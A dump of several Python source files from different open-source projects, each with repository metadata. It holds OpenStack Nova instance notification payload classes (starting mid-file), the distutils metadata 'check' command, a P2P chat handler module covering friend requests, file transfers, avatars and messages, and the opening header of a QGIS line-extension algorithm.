'architecture': ('instance', 'architecture'),
'availability_zone': ('instance', 'availability_zone'),
'image_uuid': ('instance', 'image_ref'),
'key_name': ('instance', 'key_name'),
'kernel_id': ('instance', 'kernel_id'),
'ramdisk_id': ('instance', 'ramdisk_id'),
'created_at': ('instance', 'created_at'),
'launched_at': ('instance', 'launched_at'),
'terminated_at': ('instance', 'terminated_at'),
'deleted_at': ('instance', 'deleted_at'),
'updated_at': ('instance', 'updated_at'),
'state': ('instance', 'vm_state'),
'power_state': ('instance', 'power_state'),
'task_state': ('instance', 'task_state'),
'progress': ('instance', 'progress'),
'metadata': ('instance', 'metadata'),
'locked': ('instance', 'locked'),
'auto_disk_config': ('instance', 'auto_disk_config')
}
# Version 1.0: Initial version
# Version 1.1: add locked and display_description field
# Version 1.2: Add auto_disk_config field
# Version 1.3: Add key_name field
# Version 1.4: Add BDM related data
# Version 1.5: Add updated_at field
# Version 1.6: Add request_id field
VERSION = '1.6'
fields = {
'uuid': fields.UUIDField(),
'user_id': fields.StringField(nullable=True),
'tenant_id': fields.StringField(nullable=True),
'reservation_id': fields.StringField(nullable=True),
'display_name': fields.StringField(nullable=True),
'display_description': fields.StringField(nullable=True),
'host_name': fields.StringField(nullable=True),
'host': fields.StringField(nullable=True),
'node': fields.StringField(nullable=True),
'os_type': fields.StringField(nullable=True),
'architecture': fields.StringField(nullable=True),
'availability_zone': fields.StringField(nullable=True),
'flavor': fields.ObjectField('FlavorPayload'),
'image_uuid': fields.StringField(nullable=True),
'key_name': fields.StringField(nullable=True),
'kernel_id': fields.StringField(nullable=True),
'ramdisk_id': fields.StringField(nullable=True),
'created_at': fields.DateTimeField(nullable=True),
'launched_at': fields.DateTimeField(nullable=True),
'terminated_at': fields.DateTimeField(nullable=True),
'deleted_at': fields.DateTimeField(nullable=True),
'updated_at': fields.DateTimeField(nullable=True),
'state': fields.InstanceStateField(nullable=True),
'power_state': fields.InstancePowerStateField(nullable=True),
'task_state': fields.InstanceTaskStateField(nullable=True),
'progress': fields.IntegerField(nullable=True),
'ip_addresses': fields.ListOfObjectsField('IpPayload'),
'block_devices': fields.ListOfObjectsField('BlockDevicePayload',
nullable=True),
'metadata': fields.DictOfStringsField(),
'locked': fields.BooleanField(),
'auto_disk_config': fields.DiskConfigField(),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, bdms=None):
super(InstancePayload, self).__init__()
network_info = instance.get_network_info()
self.ip_addresses = IpPayload.from_network_info(network_info)
self.flavor = flavor_payload.FlavorPayload(flavor=instance.flavor)
if bdms is not None:
self.block_devices = BlockDevicePayload.from_bdms(bdms)
else:
self.block_devices = BlockDevicePayload.from_instance(instance)
        # NOTE(Kevin_Zheng): Don't include request_id for periodic tasks,
        # as the RequestContext for periodic tasks does not include
        # project_id and user_id. Consider modifying this once periodic
        # tasks get a consistent request_id.
self.request_id = context.request_id if (context.project_id and
context.user_id) else None
self.populate_schema(instance=instance)
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionPayload(InstancePayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'fault': fields.ObjectField('ExceptionPayload', nullable=True),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, fault, bdms=None):
super(InstanceActionPayload, self).__init__(context=context,
instance=instance,
bdms=bdms)
self.fault = fault
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added key_name field to InstancePayload
# Version 1.2: Add BDM related data
# Version 1.3: Added updated_at field to InstancePayload
# Version 1.4: Added request_id field to InstancePayload
VERSION = '1.4'
fields = {
'volume_id': fields.UUIDField()
}
def __init__(self, context, instance, fault, volume_id):
super(InstanceActionVolumePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.volume_id = volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'old_volume_id': fields.UUIDField(),
'new_volume_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, old_volume_id, new_volume_id):
super(InstanceActionVolumeSwapPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.old_volume_id = old_volume_id
self.new_volume_id = new_volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreatePayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.2: Initial version. It starts at 1.2 to match with the version
# of the InstanceActionPayload at the time when this specific
# payload is created as a child of it so that the
# instance.create notification using this new payload does not
# have decreasing version.
# 1.3: Add keypairs field
# 1.4: Add key_name field to InstancePayload
# 1.5: Add BDM related data to InstancePayload
# 1.6: Add tags field to InstanceCreatePayload
# 1.7: Added updated_at field to InstancePayload
# 1.8: Added request_id field to InstancePayload
VERSION = '1.8'
fields = {
'keypairs': fields.ListOfObjectsField('KeypairPayload'),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, fault, bdms):
super(InstanceCreatePayload, self).__init__(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
self.keypairs = [keypair_payload.KeypairPayload(keypair=keypair)
for keypair in instance.keypairs]
self.tags = [instance_tag.tag
for instance_tag in instance.tags]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'new_flavor': fields.ObjectField('FlavorPayload', nullable=True)
}
def __init__(self, context, instance, fault, new_flavor):
super(InstanceActionResizePrepPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.new_flavor = new_flavor
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdatePayload(InstancePayload):
# Version 1.0: Initial version
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added tags field
# Version 1.3: Added auto_disk_config field to InstancePayload
# Version 1.4: Added key_name field to InstancePayload
# Version 1.5: Add BDM related data
# Version 1.6: Added updated_at field to InstancePayload
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'state_update': fields.ObjectField('InstanceStateUpdatePayload'),
'audit_period': fields.ObjectField('AuditPeriodPayload'),
'bandwidth': fields.ListOfObjectsField('BandwidthPayload'),
'old_display_name': fields.StringField(nullable=True),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, state_update, audit_period,
bandwidth, old_display_name):
super(InstanceUpdatePayload, self).__init__(
context=context, instance=instance)
self.state_update = state_update
self.audit_period = audit_period
self.bandwidth = bandwidth
self.old_display_name = old_display_name
self.tags = [instance_tag.tag
for instance_tag in instance.tags.objects]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescuePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'rescue_image_ref': fields.UUIDField(nullable=True)
}
def __init__(self, context, instance, fault, rescue_image_ref):
super(InstanceActionRescuePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.rescue_image_ref = rescue_image_ref
@nova_base.NovaObjectRegistry.register_notification
class IpPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'label': fields.StringField(),
'mac': fields.MACAddressField(),
'meta': fields.DictOfStringsField(),
'port_uuid': fields.UUIDField(nullable=True),
'version': fields.IntegerField(),
'address': fields.IPV4AndV6AddressField(),
'device_name': fields.StringField(nullable=True)
}
def __init__(self, label, mac, meta, port_uuid, version, address,
device_name):
super(IpPayload, self).__init__()
self.label = label
self.mac = mac
self.meta = meta
self.port_uuid = port_uuid
self.version = version
self.address = address
self.device_name = device_name
@classmethod
def from_network_info(cls, network_info):
"""Returns a list of IpPayload object based on the passed
network_info.
"""
ips = []
if network_info is not None:
for vif in network_info:
for ip in vif.fixed_ips():
ips.append(cls(
label=vif["network"]["label"],
mac=vif["address"],
meta=vif["meta"],
port_uuid=vif["id"],
version=ip["version"],
address=ip["address"],
device_name=vif["devname"]))
return ips
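
    # Illustrative vif entry consumed above (keys as accessed in the loop;
    # the values here are invented):
    #
    #   {'id': 'port-uuid', 'address': 'fa:16:3e:11:22:33', 'devname': 'tap0',
    #    'meta': {}, 'network': {'label': 'private'}}
    #
    # with vif.fixed_ips() yielding dicts like
    #   {'version': 4, 'address': '192.168.1.3'}.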
@nova_base.NovaObjectRegistry.register_notification
class BandwidthPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'network_name': fields.StringField(),
'in_bytes': fields.IntegerField(),
'out_bytes': fields.IntegerField(),
}
def __init__(self, network_name, in_bytes, out_bytes):
super(BandwidthPayload, self).__init__()
self.network_name = network_name
self.in_bytes = in_bytes
self.out_bytes = out_bytes
@nova_base.NovaObjectRegistry.register_notification
class AuditPeriodPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'audit_period_beginning': fields.DateTimeField(),
'audit_period_ending': fields.DateTimeField(),
}
def __init__(self, audit_period_beginning, audit_period_ending):
super(AuditPeriodPayload, self).__init__()
self.audit_period_beginning = audit_period_beginning
self.audit_period_ending = audit_period_ending
@nova_base.NovaObjectRegistry.register_notification
class BlockDevicePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
SCHEMA = {
'device_name': ('bdm', 'device_name'),
'boot_index': ('bdm', 'boot_index'),
'delete_on_termination': ('bdm', 'delete_on_termination'),
'volume_id': ('bdm', 'volume_id'),
'tag': ('bdm', 'tag')
}
fields = {
'device_name': fields.StringField(nullable=True),
'boot_index': fields.IntegerField(nullable=True),
'delete_on_termination': fields.BooleanField(default=False),
'volume_id': fields.UUIDField(),
'tag': fields.StringField(nullable=True)
}
def __init__(self, bdm):
super(BlockDevicePayload, self).__init__()
self.populate_schema(bdm=bdm)
@classmethod
def from_instance(cls, instance):
"""Returns a list of BlockDevicePayload objects based on the passed
bdms.
"""
if not CONF.notifications.bdms_in_notifications:
return None
instance_bdms = instance.get_bdms()
if instance_bdms is not None:
return cls.from_bdms(instance_bdms)
else:
return []
@classmethod
def from_bdms(cls, bdms):
"""Returns a list of BlockDevicePayload objects based on the passed
BlockDeviceMappingList.
"""
payloads = []
for bdm in bdms:
if bdm.volume_id is not None:
payloads.append(cls(bdm))
return payloads
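
    # Note: only volume-backed mappings (volume_id set) are included, so
    # image- and blank-based BDMs never appear in the notification payload.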
@nova_base.NovaObjectRegistry.register_notification
class InstanceStateUpdatePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'old_state': fields.StringField(nullable=True),
'state': fields.StringField(nullable=True),
'old_task_state': fields.StringField(nullable=True),
'new_task_state': fields.StringField(nullable=True),
}
def __init__(self, old_state, state, old_task_state, new_task_state):
super(InstanceStateUpdatePayload, self).__init__()
self.old_state = old_state
self.state = state
self.old_task_state = old_task_state
self.new_task_state = new_task_state
@base.notification_sample('instance-delete-start.json')
@base.notification_sample('instance-delete-end.json')
@base.notification_sample('instance-pause-start.json')
@base.notification_sample('instance-pause-end.json')
@base.notification_sample('instance-unpause-start.json')
@base.notification_sample('instance-unpause-end.json')
@base.notification_sample('instance-resize-start.json')
@base.notification_sample('instance-resize-end.json')
@base.notification_sample('instance-resize-error.json')
@base.notification_sample('instance-suspend-start.json')
@base.notification_sample('instance-suspend-end.json')
@base.notification_sample('instance-power_on-start.json')
@base.notification_sample('instance-power_on-end.json')
@base.notification_sample('instance-power_off-start.json')
@base.notification_sample('instance-power_off-end.json')
@base.notification_sample('instance-reboot-start.json')
@base.notification_sample('instance-reboot-end.json')
@base.notification_sample('instance-reboot-error.json')
@base.notification_sample('instance-shutdown-start.json')
@base.notification_sample('instance-shutdown-end.json')
@base.notification_sample('instance-interface_attach-start.json')
@base.notification_sample('instance-interface_attach-end.json')
@base.notification_sample('instance-interface_attach-error.json')
@base.notification_sample('instance-shelve-start.json')
@base.notification_sample('instance-shelve-end.json')
@base.notification_sample('instance-resume-start.json')
@base.notification_sample('instance-resume-end.json')
@base.notification_sample('instance-restore-start.json')
@base.notification_sample('instance-restore-end.json')
@base.notification_sample('instance-evacuate.json')
@base.notification_sample('instance-resize_finish-start.json')
@base.notification_sample('instance-resize_finish-end.json')
@base.notification_sample('instance-live_migration_pre-start.json')
@base.notification_sample('instance-live_migration_pre-end.json')
@base.notification_sample('instance-live_migration_abort-start.json')
@base.notification_sample('instance-live_migration_abort-end.json')
# @base.notification_sample('instance-live_migration_post-start.json')
# @base.notification_sample('instance-live_migration_post-end.json')
@base.notification_sample('instance-live_migration_post_dest-start.json')
@base.notification_sample('instance-live_migration_post_dest-end.json')
@base.notification_sample('instance-live_migration_rollback-start.json')
@base.notification_sample('instance-live_migration_rollback-end.json')
# @base.notification_sample('instance-live_migration_rollback_dest-start.json')
# @base.notification_sample('instance-live_migration_rollback_dest-end.json')
@base.notification_sample('instance-rebuild-start.json')
@base.notification_sample('instance-rebuild-end.json')
@base.notification_sample('instance-rebuild-error.json')
@base.notification_sample('instance-interface_detach-start.json')
@base.notification_sample('instance-interface_detach-end.json')
@base.notification_sample('instance-resize_confirm-start.json')
@base.notification_sample('instance-resize_confirm-end.json')
@base.notification_sample('instance-resize_revert-start.json')
@base.notification_sample('instance-resize_revert-end.json')
@base.notification_sample('instance-shelve_offload-start.json')
@base.notification_sample('instance-shelve_offload-end.json')
@base.notification_sample('instance-soft_delete-start.json')
@base.notification_sample('instance-soft_delete-end.json')
@base.notification_sample('instance-trigger_crash_dump-start.json')
@base.notification_sample('instance-trigger_crash_dump-end.json')
@base.notification_sample('instance-unrescue-start.json')
@base.notification_sample('instance-unrescue-end.json')
@base.notification_sample('instance-unshelve-start.json')
@base.notification_sample('instance-unshelve-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionPayload')
}
@base.notification_sample('instance-update.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceUpdatePayload')
}
@base.notification_sample('instance-volume_swap-start.json')
@base.notification_sample('instance-volume_swap-end.json')
@base.notification_sample('instance-volume_swap-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumeSwapPayload')
}
@base.notification_sample('instance-volume_attach-start.json')
@base.notification_sample('instance-volume_attach-end.json')
@base.notification_sample('instance-volume_attach-error.json')
@base.notification_sample('instance-volume_detach-start.json')
@base.notification_sample('instance-volume_detach-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumePayload')
}
@base.notification_sample('instance-create-start.json')
@base.notification_sample('instance-create-end.json')
@base.notification_sample('instance-create-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceCreatePayload')
}
@base.notification_sample('instance-resize_prep-start.json')
@base.notification_sample('instance-resize_prep-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionResizePrepPayload')
}
@base.notification_sample('instance-snapshot-start.json')
@base.notification_sample('instance-snapshot-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionSnapshotPayload')
}
@base.notification_sample('instance-rescue-start.json')
@base.notification_sample('instance-rescue-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescueNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionRescuePayload')
}
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotPayload(InstanceActionPayload):
# Version 1.6: Initial version. It starts at version 1.6 as
# instance.snapshot.start and .end notifications are switched
# from using InstanceActionPayload 1.5 to this new payload and
# also it added a new field so we wanted to keep the version
# number increasing to signal the change.
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'snapshot_image_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, snapshot_image_id):
super(InstanceActionSnapshotPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.snapshot_image_id = snapshot_image_id
| apache-2.0 | -2,227,258,545,918,772,700 | 38.880763 | 79 | 0.673351 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.2/Lib/distutils/command/check.py | 1 | 5369 | """distutils.command.check
Implements the Distutils 'check' command.
"""
__revision__ = "$Id: check.py 85197 2010-10-03 14:18:09Z tarek.ziade $"
from distutils.core import Command
from distutils.errors import DistutilsSetupError
try:
# docutils is installed
from docutils.utils import Reporter
from docutils.parsers.rst import Parser
from docutils import frontend
from docutils import nodes
from io import StringIO
class SilentReporter(Reporter):
def __init__(self, source, report_level, halt_level, stream=None,
debug=0, encoding='ascii', error_handler='replace'):
self.messages = []
Reporter.__init__(self, source, report_level, halt_level, stream,
debug, encoding, error_handler)
def system_message(self, level, message, *children, **kwargs):
self.messages.append((level, message, children, kwargs))
HAS_DOCUTILS = True
except Exception:
# Catch all exceptions because exceptions besides ImportError probably
# indicate that docutils is not ported to Py3k.
HAS_DOCUTILS = False
class check(Command):
"""This command checks the meta-data of the package.
"""
description = ("perform some checks on the package")
user_options = [('metadata', 'm', 'Verify meta-data'),
('restructuredtext', 'r',
('Checks if long string meta-data syntax '
'are reStructuredText-compliant')),
('strict', 's',
'Will exit with an error if a check fails')]
boolean_options = ['metadata', 'restructuredtext', 'strict']
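    # Usage sketch (for illustration only, not part of distutils itself):
    #   python setup.py check --metadata --restructuredtext --strict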
def initialize_options(self):
"""Sets default values for options."""
self.restructuredtext = 0
self.metadata = 1
self.strict = 0
self._warnings = 0
def finalize_options(self):
pass
def warn(self, msg):
"""Counts the number of warnings that occurs."""
self._warnings += 1
return Command.warn(self, msg)
def run(self):
"""Runs the command."""
# perform the various tests
if self.metadata:
self.check_metadata()
if self.restructuredtext:
if HAS_DOCUTILS:
self.check_restructuredtext()
elif self.strict:
raise DistutilsSetupError('The docutils package is needed.')
# let's raise an error in strict mode, if we have at least
# one warning
if self.strict and self._warnings > 0:
raise DistutilsSetupError('Please correct your package.')
def check_metadata(self):
"""Ensures that all required elements of meta-data are supplied.
name, version, URL, (author and author_email) or
(maintainer and maintainer_email)).
Warns if any are missing.
"""
metadata = self.distribution.metadata
missing = []
for attr in ('name', 'version', 'url'):
if not (hasattr(metadata, attr) and getattr(metadata, attr)):
missing.append(attr)
if missing:
self.warn("missing required meta-data: %s" % ', '.join(missing))
if metadata.author:
if not metadata.author_email:
self.warn("missing meta-data: if 'author' supplied, " +
"'author_email' must be supplied too")
elif metadata.maintainer:
if not metadata.maintainer_email:
self.warn("missing meta-data: if 'maintainer' supplied, " +
"'maintainer_email' must be supplied too")
else:
self.warn("missing meta-data: either (author and author_email) " +
"or (maintainer and maintainer_email) " +
"must be supplied")
def check_restructuredtext(self):
"""Checks if the long string fields are reST-compliant."""
data = self.distribution.get_long_description()
for warning in self._check_rst_data(data):
line = warning[-1].get('line')
if line is None:
warning = warning[1]
else:
warning = '%s (line %s)' % (warning[1], line)
self.warn(warning)
def _check_rst_data(self, data):
"""Returns warnings when the provided data doesn't compile."""
source_path = StringIO()
parser = Parser()
settings = frontend.OptionParser().get_default_values()
settings.tab_width = 4
settings.pep_references = None
settings.rfc_references = None
reporter = SilentReporter(source_path,
settings.report_level,
settings.halt_level,
stream=settings.warning_stream,
debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
try:
parser.parse(data, document)
except AttributeError:
reporter.messages.append((-1, 'Could not finish the parsing.',
'', {}))
return reporter.messages
| mit | -768,187,753,055,831,900 | 36.284722 | 78 | 0.575899 | false |
cbrunker/quip | lib/Handlers.py | 1 | 11422 | #
# Response handlers for P2P Server
#
import asyncio
import logging
from functools import partial
from hashlib import sha1, sha384
from uuid import uuid4
from os import path
from lib.Database import getFriendRequests, getSigningKeys, setUidMask, storeAuthority, setFriendAuth, getMessageKeys, \
setAddress, getFileRequests, storeFileRequest, delFileRequests, delFriendRequests, getFriendChecksum, \
updateFriendDetails, storeHistory
from lib.Utils import isValidUUID, sha1sum
from lib.Constants import BTRUE, BFALSE, WRITE_END, COMMAND_LENGTH, NONEXISTANT, PROFILE_VALUE_SEPARATOR, \
LIMIT_AVATAR_SIZE, MODIFIED_FILE
######################################
# Server Dispatch Coroutine Handlers
######################################
@asyncio.coroutine
def friendAcceptance(reader, writer, safe, profileId, data, requests=None):
"""
Handle incoming friend request acceptance (P2P)
Once a request has been made, and the destination user accepts, the destination user contacts the request user
who runs this coroutine to complete the friendship.
Requester->Server (quip client, friendRequest)
Server->Destination (Heartbeat token)
Destination->Server (quip client, getRequests)
Destination->Requester (p2p client, friendCompletion) to (p2p server, this coroutine)
@param reader: StreamReader object
@param writer: StreamWriter objet
@param safe: crypto box
@param profileId: profile ID of logged in user
@param data: uid followed by hash of message
    @param requests: (Optional) recent outgoing friend requests, mapping {uid: (message, timestamp, _, rowid)}
@return: Auth token
"""
if not requests:
requests = {}
# auth token
auth = None
try:
# verify required input data length
assert len(data) == 76
# user id, message hash
mhash, uid = data[:-36], data[-36:]
# valid UUID
assert isValidUUID(uid) is True
except AssertionError:
logging.info("\t".join(("Invalid friend completion data received", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), auth
if uid not in requests:
# check db for older requests
requests.update(getFriendRequests(safe, profileId))
# obtain request information for this user (uid)
try:
msg, timestamp, _, rowid = requests[uid]
except KeyError:
logging.warning("\t".join(("Friend Request Failure",
"No friend request found for given user ID", "UID: {!r}".format(uid))))
return b''.join((BFALSE, WRITE_END)), auth
# ensure our potential friend has the correct hash value for the friend request
try:
assert mhash.decode('ascii') == sha1(b''.join((uid, msg))).hexdigest()
except (UnicodeDecodeError, AssertionError):
logging.warning("\t".join(("Friend Request Failure", "Hash values do not match",
"Sent: {!r}".format(mhash),
"Local: {!r}".format(sha1(b''.join((uid, msg))).hexdigest()))))
return b''.join((BFALSE, WRITE_END)), auth
# hash value has matched, get public key
spub = getSigningKeys(safe, profileId)[1]
mpub = getMessageKeys(safe, profileId)[1]
# auth token sent to friend
token = bytes(str(uuid4()), encoding='ascii')
# create our auth token to be sent to server
auth = bytes(sha384(b''.join((uid, token))).hexdigest(), encoding='ascii')
# work out length of data
data = b''.join((token, spub, mpub))
    # send the length to read, followed by the auth token and public keys
writer.write(b''.join((bytes(str(len(data)), encoding='ascii'), WRITE_END, data)))
yield from writer.drain()
# recv back success to confirm storage of sent data by friend
success = yield from reader.readline()
try:
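        # first byte must be b'1' (ASCII 49), confirming the friend stored our data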
assert int(success[0]) == 49
int(success)
except (KeyError, ValueError):
logging.warning("\t".join(("Friend Request Warning",
"Friendship completion failed. Storage confirmation: {!r}".format(success))))
return b''.join((BFALSE, WRITE_END)), None
port = success[1:-1]
# receive length to read
data = yield from reader.readline()
try:
length = int(data)
except ValueError:
return b''.join((BFALSE, WRITE_END)), None
data = yield from reader.read(length)
fauth, spub, mpub = data[:36], data[36:100], data[100:]
try:
assert len(data) > 115
assert isValidUUID(fauth) is True
except AssertionError:
logging.error("\t".join(("Friend Request Failure",
"Invalid mask or public key provided", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), None
# created and store localised mask of friend's true ID
fmask = setUidMask(safe, profileId, uid)
# store friend's auth mask
# (the mask we use when submitting authorised requests to the hub server regarding this friend)
setFriendAuth(safe, profileId, fmask, fauth, auth)
# store public key for friend
storeAuthority(safe, profileId, fmask, spub, mpub)
# store address locally
setAddress(safe, profileId, fmask,
b':'.join((bytes(writer.transport.get_extra_info('peername')[0], encoding='ascii'), port)))
# delete local friend request storage
delFriendRequests(rowid)
# True for success of all required friendship steps, hash of auth token we sent to friend (must be sent to hub server)
return BTRUE, auth
@asyncio.coroutine
def requestSendFile(safe, profileId, mask, data):
"""
Handle and store request for file transfer
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
    @param data: filename, size and checksum separated by PROFILE_VALUE_SEPARATOR, followed by the user ID
    @return: (user id, filename, size, checksum, rowid) on success, otherwise False
"""
try:
filename, size, checksum = data[:-36].split(bytes(PROFILE_VALUE_SEPARATOR, encoding='utf-8'))
except ValueError:
logging.info("Invalid file request data recieved: {!r}".format(data))
return False
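    # the checksum field carries trailing command bytes; strip them off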
checksum = checksum[:-COMMAND_LENGTH]
# validate received data
try:
# sha1 hex length
assert len(checksum) == 40
# size in bytes must be integer
int(size)
except AssertionError:
logging.info("Invalid file request data received, checksum is not correct length: {!r}".format(checksum))
return False
except ValueError:
logging.info("Invalid file request data received, size is not an integer: {!r}".format(size))
return False
# store file transfer request
rowid = storeFileRequest(safe, profileId, outgoing=False, mask=mask, request=(filename, size, checksum))
return data[-36:], filename, size, checksum, rowid
@asyncio.coroutine
def sendFile(writer, safe, profileId, mask, checksum, expiry, blockSize=4098):
"""
    Send a file from the server to the client destination
@param writer: StreamWriter object to client
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
@param checksum: sha1 sum value of file to be sent
@param expiry: expire days for file transfer requests (config set value)
@param blockSize: total number of bytes to read at once
@return: True when file if completely sent, otherwise False
"""
try:
# obtain current requests for provided mask and clear expired requests
filename, size, rowid = getFileRequests(safe, profileId, outgoing=True, mask=mask, expire=expiry)[mask][checksum]
except KeyError:
logging.warning("\t".join(("File Transfer Failed",
"File transfer request does not exist for mask {} and checksum {}".format(mask, checksum))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
if not path.isfile(filename):
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File no longer exists: {}".format(filename))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
# match file checksum to ensure the same file which was to be sent
# has not been modified since the original transfer request
cursum = sha1sum(filename)
if checksum != cursum:
# remove invalid transfer request
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File has been modified",
"Filename: {}".format(filename),
"Original checksum: {}".format(checksum),
"Current checksum: {}".format(cursum))))
writer.write(MODIFIED_FILE)
yield from writer.drain()
return False
blockSize = int(blockSize)
with open(filename, 'rb') as fd:
for buf in iter(partial(fd.read, blockSize), b''):
writer.write(buf)
yield from writer.drain()
# remove file transfer request from storage
delFileRequests(rowid)
return True
@asyncio.coroutine
def receiveAvatar(reader, writer, safe, profileId, mask, checksum):
"""
Receive avatar update check from friend
@param reader: client streamreader object
@param writer: streamwriter object
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: friend mask uid
@param checksum: avatar sha1 checksum
@return: '0' if avatar not updated, otherwise locally calculated checksum value of stored avatar
"""
if len(checksum) != 40:
logging.warning("Friend mask '{}' tried to send invalid checksum value: {!r}".format(mask, checksum))
return BFALSE
try:
checksum = checksum.decode('ascii')
except UnicodeDecodeError:
return BFALSE
# compare local checksum value
if checksum != getFriendChecksum(safe, profileId, mask):
writer.write(BTRUE)
yield from writer.drain()
else:
return BFALSE
# get size of avatar to read from friend
size = yield from reader.readline()
try:
size = int(size)
assert size < LIMIT_AVATAR_SIZE
except (ValueError, AssertionError):
logging.warning("Friend mask '{}' tried to send invalid avatar size value: {!r}".format(mask, size))
return BFALSE
writer.write(BTRUE)
yield from writer.drain()
# read avatar into memory
avatar = yield from reader.readexactly(size)
# store avatar
storedChecksum = updateFriendDetails(safe, profileId, mask, avatar=avatar)
# send locally calculated checksum value as verification of storage
return storedChecksum
@asyncio.coroutine
def receiveMessage(safe, profileId, mask, data):
"""
    Process data as a received message
    @param data: bytes of the message followed by the 36-byte sender uid
    @return: (rowid, user id, received message) if a message exists, else False
"""
# msg portion of data
msg = data[:-36 - COMMAND_LENGTH]
rowid = storeHistory(safe, profileId, mask, msg, fromFriend=True)
# uid, msg
return (rowid, data[-36:], msg) if msg else False
#######################
# P2P Client Handlers
#######################
@asyncio.coroutine
def inviteChat():
pass
| gpl-3.0 | 8,537,975,647,144,394,000 | 35.492013 | 127 | 0.651112 | false |
t-hey/QGIS-Original | python/plugins/processing/algs/qgis/ExtendLines.py | 1 | 2995 | # -*- coding: utf-8 -*-
"""
***************************************************************************
ExtendLines.py
--------------------
Date : October 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'October 2016'
